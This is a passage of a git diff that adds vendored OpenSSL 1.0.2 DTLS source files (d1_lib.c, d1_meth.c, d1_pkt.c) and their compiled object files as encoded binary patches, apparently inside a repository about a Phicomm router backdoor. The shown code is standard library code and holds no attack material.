+#if defined(_WIN32)
+    SYSTEMTIME st;
+    union {
+        unsigned __int64 ul;
+        FILETIME ft;
+    } now;
+
+    GetSystemTime(&st);
+    SystemTimeToFileTime(&st, &now.ft);
+# ifdef  __MINGW32__
+    now.ul -= 116444736000000000ULL;
+# else
+    now.ul -= 116444736000000000UI64; /* re-bias to 1/1/1970 */
+# endif
+    t->tv_sec = (long)(now.ul / 10000000);
+    t->tv_usec = ((int)(now.ul % 10000000)) / 10;
+#elif defined(OPENSSL_SYS_VMS)
+    struct timeb tb;
+    ftime(&tb);
+    t->tv_sec = (long)tb.time;
+    t->tv_usec = (long)tb.millitm * 1000;
+#else
+    gettimeofday(t, NULL);
+#endif
+}
+
+int dtls1_listen(SSL *s, struct sockaddr *client)
+{
+    int ret;
+
+    SSL_set_options(s, SSL_OP_COOKIE_EXCHANGE);
+    s->d1->listen = 1;
+
+    ret = SSL_accept(s);
+    if (ret <= 0)
+        return ret;
+
+    (void)BIO_dgram_get_peer(SSL_get_rbio(s), client);
+    return 1;
+}
+
+static void dtls1_set_handshake_header(SSL *s, int htype, unsigned long len)
+{
+    unsigned char *p = (unsigned char *)s->init_buf->data;
+    dtls1_set_message_header(s, p, htype, len, 0, len);
+    s->init_num = (int)len + DTLS1_HM_HEADER_LENGTH;
+    s->init_off = 0;
+    /* Buffer the message to handle re-xmits */
+    dtls1_buffer_message(s, 0);
+}
+
+static int dtls1_handshake_write(SSL *s)
+{
+    return dtls1_do_write(s, SSL3_RT_HANDSHAKE);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..f82efa90af3eb90c234d370b513197c99270f913
GIT binary patch
literal 10416
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
Ua)|JLM=s(S`<|UuuFn4d0Tq=7i2wiq

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_meth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_meth.c
new file mode 100644
index 0000000..7340774
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_meth.c
@@ -0,0 +1,88 @@
+/* ssl/d1_meth.h */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+static const SSL_METHOD *dtls1_get_method(int ver);
+static const SSL_METHOD *dtls1_get_method(int ver)
+{
+    if (ver == DTLS1_VERSION)
+        return (DTLSv1_method());
+    else if (ver == DTLS1_2_VERSION)
+        return (DTLSv1_2_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_dtls1_meth_func(DTLS1_VERSION,
+                          DTLSv1_method,
+                          dtls1_accept,
+                          dtls1_connect, dtls1_get_method, DTLSv1_enc_data)
+
+    IMPLEMENT_dtls1_meth_func(DTLS1_2_VERSION,
+                          DTLSv1_2_method,
+                          dtls1_accept,
+                          dtls1_connect, dtls1_get_method, DTLSv1_2_enc_data)
+
+    IMPLEMENT_dtls1_meth_func(DTLS_ANY_VERSION,
+                          DTLS_method,
+                          dtls1_accept,
+                          dtls1_connect, dtls1_get_method, DTLSv1_2_enc_data)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_meth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_meth.o
new file mode 100644
index 0000000000000000000000000000000000000000..33050a10e3fd80f1610da069e7e6fef9dfa8bfae
GIT binary patch
literal 6112
zcmd^@O^g&p6vt~AkOdJC6;Tvt!4FXB%q)w5iDts*nh-)%5)ULzZ%^&cgqiNiObsj^
zP!1-0QSnCNg&Q7?UWgZnUOZ^RO)e&Q<6umTH^0Vu-LGc;ubH~&O)8mvuYUDj)vKC+
zf6Tsj<oMAQrIK>3q+VC!o})@t9v%Dj%&n^pYQ6ex!?xe&K3qlQ(s1~<QfBj|;a}D=
z{E9~AHXQl-8;JD!6fE0tIH?*L^MCHqQQpsuBz0f3V}}mCTG@GOevp_!<v_3}sP3-q
z8)V(u#hGeQo!yn={4`ctv(bL&$~$)Alv<(GO=4yHq2?~v(z|b}($dD#)^)3=F563q
za-PZ}lzNdZu`2uPfE}K|-YGEd-ec&hU8#N@-ZNl9dEy<0xT{`fmF-N$_MinTU>>&@
z+FOZE#U2Q?ySY(&t<5;!P8>h!ILA3o-EwxiJOHMwrl2==%WBQI172CJh2GdLtJUKU
zdyCd?vX#31xbI`Y{1uLK`~&6(3;Yw?r|-4cKDA&Hzvkgzc=!zu|K7uY@bI5J{AUmU
z!^79Hw(YQJJ3M@^hadIu$ivTh_$3ej*u$@R_ze&L&clE7@LxQ9rM*rj>0z^n&v^I|
z4?peUs!<C&+BAb$HB7r-3m3J?K-y4;-#-4<xqLWngpJ5VL2Y)ndcY0LaNuaDwkI39
z2k&zkw9<HDmybzYMWWBM7q@lPV}GHiHM>z9>#lJzX_DyJsD8h_C+z8{k$YXO&*t9w
zUdy=5esf?N>G{M(Cweh8t;mjZ`Ur$^Q^#j{jr?5t{b<omL<@!U7mV(6NVZBCb-USt
zh@nQS-;GS%45PO0jmkE?cD`tAmcn?{qov|jx2bz}4qJrXe^y#|;Nd!Hw35X<C>eA(
z*_Ab(j_Yjbg=o+=p=ot=Ixz0bnF)0gXQk6j;UKYbtwcA%b7`v)E)0^`v{F8{IBK`&
zqxdXTo$Wzj*3W2Gx*@nbt(9YTm;TdU57gYVaKv-0YHUZG<6kRs?!Qsw!@RjC1*JdC
zF=X5|M|>0TE$kD21b79wd$tqW3H&kk$y9-F2EHHo<G|~{T@8fhfIq=LnUlbu1n%As
zsQ#_M&#+J2ojIW<@Tb`)(*?c__!97EfWHsC0(=?xH1Ny7w*$Wdd<XEWz@G*F8Sv+T
ze-8Y4;MakZwp_c(4xP^n4qE#y@SVVK0pA7uHgNY2LFf+fm)IvWMGM+SM(7i`&?j)A
zPvAnIz=b}63w;6?`UJiut2qBN2VCeAxX>qXp-<pKpTLDafeU>C7y1NVf%=z$PXniS
zb!udUK7k8;0vGxOF7ydp=o7fmCvc%p;6k6kg+74`eF7Ky<RWNT=o7fmCvc%p;6k6k
zg+74`eF7Ky1TORmT<8<H&?j)APvAnIz=b}63w;6?`UGCFXYJZD@M#CFy$pOi@GHQD
zK7k8;0vGxOF7yeU-E8%nz=b}6zYKNW0xt9kT<8-x>a)Ug(lCc)WVXQFTyq8Pe$SmQ
z@Pph}LH|O>MDx~~UT&Mt>*;nB7`<dvKrhKEnD6&hkkRa=*?K`QRY9C~Iy$jYNosUp
z|68!TZ|pl1_ZO2v(CwvN`+j(Vvvo6E=tUjvYWNSfVsq)*eV{N$o%<&WoNogoO4k7W
z`mc{j?%Z9Q+a>1odzf;kxbLn((hl+Be-=LCxS}bpPnw}Q|7|{fzmwL#YB{yLC>q<Z
z5QIkWp_BH1hW-I!+nv?9rTwq6pW^-xSw`zu?FZX3ZwR$a<8J@X9tVc`UltF92VI_v
zC0$dAg>9<qoL_N)Y+d~h8|%=V#r)fx-*ka&i}|VLlg_Ws4~H|HN9RY9a`{d_lh&q`
sI!$WZezp%;f4%(_^Ve85>8O@CuwB?#@%-qSH!1%r*MHHDV=LzW1MB>#y8r+H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_pkt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_pkt.c
new file mode 100644
index 0000000..c07be8f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_pkt.c
@@ -0,0 +1,1921 @@
+/* ssl/d1_pkt.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "ssl_locl.h"
+#include <openssl/evp.h>
+#include <openssl/buffer.h>
+#include <openssl/pqueue.h>
+#include <openssl/rand.h>
+
+/* mod 128 saturating subtract of two 64-bit values in big-endian order */
+static int satsub64be(const unsigned char *v1, const unsigned char *v2)
+{
+    int ret, sat, brw, i;
+
+    if (sizeof(long) == 8)
+        do {
+            const union {
+                long one;
+                char little;
+            } is_endian = {
+                1
+            };
+            long l;
+
+            if (is_endian.little)
+                break;
+            /* not reached on little-endians */
+            /*
+             * following test is redundant, because input is always aligned,
+             * but I take no chances...
+             */
+            if (((size_t)v1 | (size_t)v2) & 0x7)
+                break;
+
+            l = *((long *)v1);
+            l -= *((long *)v2);
+            if (l > 128)
+                return 128;
+            else if (l < -128)
+                return -128;
+            else
+                return (int)l;
+        } while (0);
+
+    ret = (int)v1[7] - (int)v2[7];
+    sat = 0;
+    brw = ret >> 8;             /* brw is either 0 or -1 */
+    if (ret & 0x80) {
+        for (i = 6; i >= 0; i--) {
+            brw += (int)v1[i] - (int)v2[i];
+            sat |= ~brw;
+            brw >>= 8;
+        }
+    } else {
+        for (i = 6; i >= 0; i--) {
+            brw += (int)v1[i] - (int)v2[i];
+            sat |= brw;
+            brw >>= 8;
+        }
+    }
+    brw <<= 8;                  /* brw is either 0 or -256 */
+
+    if (sat & 0xff)
+        return brw | 0x80;
+    else
+        return brw + (ret & 0xFF);
+}
+
+static int have_handshake_fragment(SSL *s, int type, unsigned char *buf,
+                                   int len, int peek);
+static int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);
+static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);
+static DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr,
+                                      unsigned int *is_next_epoch);
+#if 0
+static int dtls1_record_needs_buffering(SSL *s, SSL3_RECORD *rr,
+                                        unsigned short *priority,
+                                        unsigned long *offset);
+#endif
+static int dtls1_buffer_record(SSL *s, record_pqueue *q,
+                               unsigned char *priority);
+static int dtls1_process_record(SSL *s);
+
+/* copy buffered record into SSL structure */
+static int dtls1_copy_record(SSL *s, pitem *item)
+{
+    DTLS1_RECORD_DATA *rdata;
+
+    rdata = (DTLS1_RECORD_DATA *)item->data;
+
+    if (s->s3->rbuf.buf != NULL)
+        OPENSSL_free(s->s3->rbuf.buf);
+
+    s->packet = rdata->packet;
+    s->packet_length = rdata->packet_length;
+    memcpy(&(s->s3->rbuf), &(rdata->rbuf), sizeof(SSL3_BUFFER));
+    memcpy(&(s->s3->rrec), &(rdata->rrec), sizeof(SSL3_RECORD));
+
+    /* Set proper sequence number for mac calculation */
+    memcpy(&(s->s3->read_sequence[2]), &(rdata->packet[5]), 6);
+
+    return (1);
+}
+
+static int
+dtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)
+{
+    DTLS1_RECORD_DATA *rdata;
+    pitem *item;
+
+    /* Limit the size of the queue to prevent DOS attacks */
+    if (pqueue_size(queue->q) >= 100)
+        return 0;
+
+    rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));
+    item = pitem_new(priority, rdata);
+    if (rdata == NULL || item == NULL) {
+        if (rdata != NULL)
+            OPENSSL_free(rdata);
+        if (item != NULL)
+            pitem_free(item);
+
+        SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
+        return (0);
+    }
+
+    rdata->packet = s->packet;
+    rdata->packet_length = s->packet_length;
+    memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));
+    memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));
+
+    item->data = rdata;
+
+#ifndef OPENSSL_NO_SCTP
+    /* Store bio_dgram_sctp_rcvinfo struct */
+    if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
+        (s->state == SSL3_ST_SR_FINISHED_A
+         || s->state == SSL3_ST_CR_FINISHED_A)) {
+        BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO,
